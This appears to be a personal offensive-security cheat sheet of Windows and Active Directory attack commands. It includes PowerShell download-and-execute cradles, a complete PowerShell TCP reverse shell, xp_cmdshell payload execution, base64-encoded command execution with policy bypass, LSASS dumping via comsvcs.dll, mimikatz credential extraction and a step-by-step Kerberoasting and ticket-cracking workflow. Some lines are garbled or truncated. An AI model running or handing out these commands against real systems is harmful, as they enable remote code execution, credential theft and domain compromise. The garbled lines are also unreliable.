Windows hacks

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC_NAME:1433"

Download files with powershell:

On Web shell:

IEX (New-Object Net.WebClient).downloadString('
powershell IEX(New-Object Net.WebClient).DownloadFile('http://') 
powershell IEX(New-Object Net.WebClient).downloadString('http://') 

Transfer mimikatz to a Temp directory:

(New-Object Net.WebClient).DownloadFile("","C:\Windows\Temp\mimikatz.exe")

certutil -urlcache -split -f C:\backup\Scripts\backup_powershell.ps1
powershell IEX(New-Object Net.WebClient).DownloadFile(""),"C:\Windows\Users\Bethany\Documents\mimikatz.exe"
powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("");Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat 
# Nikhil SamratAshok Mittal:

$client = New-Object System.Net.Sockets.TCPClient("",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"\");"

Get-NetDomain -Domain

$cred = New-Object System.Management.Automation.PSCredential('MSSQLSvc/DC_NAME\user', $secpasswd)

Cool Reverse shell Trick:

reverse shell not working???

To mitigate bad character issue on the reverse shell (ps1), we can first convert everything into UTF-16LE (This is how windows programs are constructed) and base64 encode it.

cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0 

this is converting UTF to little indian format > then base64

copy the input and use it to execute command

powershell.exe -nop -exec bypass -enc BASE64_COMMANDSSSSSS

If mimikatz is not working try different versions! (i.e) 2.1

Dumping Isass

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 536 C:\Users\administrator.xor\Desktop\lsass.dmp full
PNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC_NAME:1433"
MiniDump 536 C:\Users\administrator.xor\Desktop\lsass.dmp full

Active Directory Workflow (Case Study 1)

1.Obtain SPN data with GetSPN.ps1 (Take notes on Service names and domain info)

2. copy nc.exe to the windows machine and get a reverse shell back(stable)

3. Once stable,

open powershell and do

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "Servicename/domain:port"

4. open up mimikatz.(make sure you have the right version for the os ----> 32bit/64)

and dump kerbero tickets

kerberos::list /export

this should dump all the tickets and results will be saved into the victim's computer.

5. Copy the file over to the kali and make it to hashcat form with

Cracking a ticket:

python3 /home/kali/Downloads/kerberoast-master/ ~/rockyou.txt kirby.kirby

6. Once cracked you can try to login to the account with evilrm (use the service name you obtained from the step 1)

❯ ./evil-winrm.rb -i IP -u User -p PASS

look for plaintext passwords

Mimikatz console (multiple commands)

PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
# lsadump::sam

mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest

mimikatz cheatsheet:

and /evilwinrm to getin to the admin shell.

Last updated